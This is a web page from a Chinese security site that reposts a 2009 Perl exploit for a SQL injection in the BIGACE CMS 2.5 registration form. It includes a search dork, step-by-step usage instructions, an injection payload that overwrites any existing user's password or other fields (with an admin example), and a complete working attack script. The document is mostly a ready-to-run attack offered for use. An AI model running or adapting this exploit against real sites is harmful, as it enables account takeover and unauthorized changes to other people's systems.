首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BIGACE CMS 2.5 (username) Remote SQL Injection Exploit
来源:y3nh4ck3r[at]gmail[dot]com 作者:YEnH4ckEr 发布时间:2009-05-13  
#!/usr/bin/perl
#***********************************************************************************************
#***********************************************************************************************
#**              **
#**        **
#**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
#**     || || ||  []        [][]   []   []  []     []   []      [] []   []   []    []    **
#   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
#**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
#**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
#**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
#   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []   
#**                                       **
#**          **
#**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
#**   ¡PROUD TO BE SPANISH!                               **
#**       **
#***********************************************************************************************
#***********************************************************************************************
#
#----------------------------------------------------------------------------------------------
#|       (Post Form --> User register (username)) User options changer (SQLi) EXPLOIT       |
#|--------------------------------------------------------------------------------------------|
#|                          |   Bigace CMS -stable release- 2.5    |               |
#|  CMS INFORMATION:         --------------------------------------       |
#|               |
#|-->WEB: http://www.bigace.de/                        |
#|-->DOWNLOAD: http://downloads.sourceforge.net/bigace/               |
#|-->DEMO: http://www.bigace.de/demo.html       |
#|-->CATEGORY: CMS / Blogging       |
#|-->DESCRIPTION: BIGACE is an easy-to-use multisite, multilanguage and multiuser             |
#| Web CMS, written for PHP/MySQL.Uses FCKeditor for HTML editing...       |
#|-->RELEASED: 2009-04-27       |
#|       |
#|  CMS VULNERABILITY:       |
#|       |
#|-->TESTED ON: firefox 3                                      |
#|-->DORK: "Powered by BIGACE 2.5"       |
#|-->CATEGORY: USER OPTIONS CHANGER/ SQL INJECTION/ PERL EXPLOIT       |
#|-->AFFECT VERSION: LAST = 2.5 (Maybe <= ?)                   |
#|-->Discovered Bug date: 2009-04-27       |
#|-->Reported Bug date: 2009-04-27       |
#|-->Fixed bug date: 2009-05-04       |
#|-->Info patch (2.6): http://www.bigace.de/BIGACE-2.6.html       |
#|-->Author: YEnH4ckEr       |
#|-->mail: y3nh4ck3r[at]gmail[dot]com       |
#|-->WEB/BLOG: N/A       |
#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)       |
#----------------------------------------------------------------------------------------------
#
#------------
#CONDITIONS:
#------------
#
#**gpc_magic_quotes=off
#
#-----------------
#PRE-REQUIREMENTS
#-----------------
#
#Package --> allow.self.registration --> True (Default value)
#
#-------
#NEED:
#-------
#
#**valid username
#
#**real captcha code/img
#
#**maybe PHPSESSID (with securimage captcha plugin)
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#Register module (username option) is vuln to sql injection.
#
#Username --> Proof of concept','password','thisisthelanguage')%23
#
#Other parameters --> something
#
#
#---------------------------------------
#EXPLOIT (SQL INJECTION):
#---------------------------------------
#
#If you find a valid username, it can use --> "ON DUPLICATE KEY UPDATE column=value",
#
#this clause updates the previous row if a unique index is affected (username) and
#
#doesn't insert a new row. So (username=admin --> valid user):
#
#Username --> admin','any','any') ON DUPLICATE KEY UPDATE password=MD5(12345)%23
#
#Other parameters --> something
#
#If username=admin exists then, his password is changed to 12345!
#
#---------------------------------------
#INSTRUCTIONS:
#---------------------------------------
#
#Go to vuln web --> user register
#
#Copy the captcha image name/sid:
#
#For example --> b2evo_captcha_e24cf14f6a03283413dfb7133624a39e  --> Use the b2evo captcha!
#
#For example --> ead9c0aa4822c265b346c67390b7235d  --> Use the securimage captcha!
#
#Copy the captcha text. For example --> WEGKA
#
#Search a valid user. For example --> admin
#
#Choose a column. Possibilities: id,cid,email,username,password,language or active.
#
#Introduce a value for this column.
#
#If captcha uses securimage also you need PHPSESSID to exploit.
#
#Launch the exploit!
#
#Note: If username isn't valid, ie, he doesn't exist then, a new invalid user is inserted.
#
#
#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##   GREETZ TO: JosS, Ulises2k and all SPANISH Hack3Rs community!    ##
##*******************************************************************##
#######################################################################
#######################################################################
#
use LWP::UserAgent;
use HTTP::Request;
use Digest::MD5 qw(md5_hex);
#Subroutines
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title BIGACE CMS 2.5 (User Options changer) Exploit");
system ("color 02");
}
}
sub request {
my $userag = LWP::UserAgent->new;
$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
my $request = HTTP::Request -> new(POST => $_[0]);
if($_[2] == 1){
#Securimage needs PHPSESSID
$request->header(cookie => "PHPSESSID=".$_[3]);
}
#I need referer for captcha
$request->referer($_[0]);
$request->content_type('application/x-www-form-urlencoded');
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
print "\t--->Maybe:\n\n";
print "\t\t1.-Patched or magic_quotes_gpc=ON.\n";
print "\t\t2.-User doesn't exist.\n";
print "\t\t3.-Error in captcha code or image.\n";
print "\t\t4.-Column doesn't exist.\n";
print "\t\t5.-Bad path or host.\n";
print "\t\t6.-Repeat captcha with option 1 (securimage).\n\n";
print "\t\tEXPLOIT FAILED!\n";
print "\t------------------------------------------------------------\n";
}
sub helper {
print "\n\t[!!!] BIGACE-CMS--stable-release-2.5-->(User Options) Exploit\n";
print "\t[!!!] USAGE MODE: [!!!]\n";
print "\t[!!!] perl $0 [HOST] [PATH] [Type Captcha] [Captcha/ssid img] [Captcha code] [Column] [Value] [User]\n";
print "\t[!!!] [HOST]: Web.\n";
print "\t[!!!] [PATH]: Home Path.\n";
print "\t[!!!] [Type Captcha]: B2Evo --> 0. Securimage --> 1. Default: 0\n";
print "\t[!!!] [Captcha/ssid img]: Img captcha name (0) or Img ssid name (1).\n";
print "\t[!!!] [Captcha code]: Captcha text.\n";
print "\t[!!!] [Column]: email,active(0/1),username,password,id,cid or language\n";
print "\t[!!!] [Value]: Set changed value\n";
print "\t[!!!] [User]: Username to change\n";
print "\t[!!!] [PHPSESSID]: Securimage needs PHPSESSID.\n";
print "\t[!!!] Example-1: perl $0 'www.example.es' 'bigace' '0' 'b2evo_captcha_ed5c10cb69be1ee9340b3743c8718fe2'\n";
    print "\t[!!!]       'EWZ3L' 'password' '12345' 'admin'\n";
print "\t[!!!] Example-2: perl $0 'www.example.es' 'bigace' '1' '6f15b93e170f5f5e50922361b06d228d'\n";
    print "\t[!!!]       'EWZ3' 'password' '12345' 'admin' 'u3h7on9taiihpbm51roeqqq2q2'\n";
print "\t[!!!] Note: If option 0 is available you can use this captcha code to change more options!\n\n";
}
#Main
&lw;
print "\t#######################################################\n\n";
print "\t#######################################################\n\n";
print "\t##   BIGACE CMS 2.5 - (User Options changer) Exploit ##\n\n";
print "\t##       ++Conditions: magic_quotes=off              ##\n\n";
print "\t##       ++Needed: Username to change                ##\n\n";
print "\t##       ++Needed: Valid captcha img/code            ##\n\n";
print "\t##             Author: Y3nh4ck3r                     ##\n\n";
print "\t##     Contact:y3nh4ck3r[at]gmail[dot]com            ##\n\n";
print "\t##            Proud to be Spanish!                   ##\n\n";
print "\t#######################################################\n\n";
print "\t#######################################################\n\n";
#Init variables
my $host=$ARGV[0];
my $path=$ARGV[1];
my $img=$ARGV[3];
my $code=$ARGV[4];
my $columns=$ARGV[5];
my $values=$ARGV[6];
my $username=$ARGV[7];
if(($ARGV[2]==0) || ($ARGV[2]==1)){
$option=$ARGV[2];
$numArgs = $#ARGV + 1;
if($numArgs<=7)
{
&helper;
exit(1);
}
}else{
$option=0;
$numArgs = $#ARGV + 1;
if($numArgs<=6)
{
&helper;
exit(1);
}
}
if($columns eq "password"){
$values=md5_hex($values); #pass in md5
}
#Build the uri
my $finalhost="http://".$host."/".$path."/index.php?cmd=application&id=-1_tauth_kregister_len";
#Check all variables needed
#sql injection
$injection=$username."','any','any') ON DUPLICATE KEY UPDATE ".$columns."='".$values."'%23";
#build posts with injection
if($option==0){
$post="register=do&validate=http://".$host."/".$path."/addon/b2evo/b2evo_captcha_tmp/".$img.".jpg&username=";
$PHPSESSID="nothing";
}else{
$post="register=do&validate=http://".$host."/".$path."/addon/securimage/show_captcha.php?sid=".$img."&username=";
$PHPSESSID=$ARGV[8];
}
$post.=$injection."&language=en&email=y3nh4ck3r@gmail.com&password=xxxxxxxxxxx&pwdrecheck=xxxxxxxxxxx&captcha=".$code."&sumbit=Create";
$output=&request($finalhost, $post, $option, $PHPSESSID);
#processed
if($output!~(/Title: 404 Not Found/))
{
if ($output!~(/\<div align=\"center\" id=\"registerError\"\>/))
{  
print "\n\t---------------------------------------------------------------\n";
print "\t--  EXPLOIT EXECUTED (BIGACE CMS 2.5 User Options changer)   --\n";
print "\t---------------------------------------------------------------\n\n";
print "\t\tUser option changed!\n\n";
print "\t\tOption changed: ".$columns."\n";
print "\t\tNew value: ".$values."\n\n";
print "\t\tIf username isn't real, you add a new inconsistent active user!\n\n";
print "\t\tNote: If option 0 is available you can use this captcha code\n";
print "\t\tto change more options!\n\n";
print "\n\t<<<<<<----------------------FINISH!---------------->>>>>>>>\n\n";
print "\t<<<<<<--------------Thanks to: y3hn4ck3r------------>>>>>>>\n\n";
print "\t<<<<<<-----------------------EOF-------------------->>>>>>>\n\n";
}else{
&error;
}
}else{
&error;
}
exit(1);
#Ok...all job done

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CastRipper 2.50.70 (.pls) Univ
·Bitweaver <= 2.6 /boards/board
·CastRipper 2.50.70 (.m3u) Univ
·(POST var 'rating') BLIND SQL
·CastRipper 2.50.70 (.m3u) Univ
·Java SE Runtime Environment -
·CastRipper 2.50.70 (.m3u) Loca
·ipsec-tools racoon frag-isakmp
·Pinnacle Studio 12 (.hfz) Dire
·Bitweaver <= 2.6 saveFeed() Re
·Family Connections CMS <= 1.9
·TinyWebGallery <= 1.7.6 LFI /
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved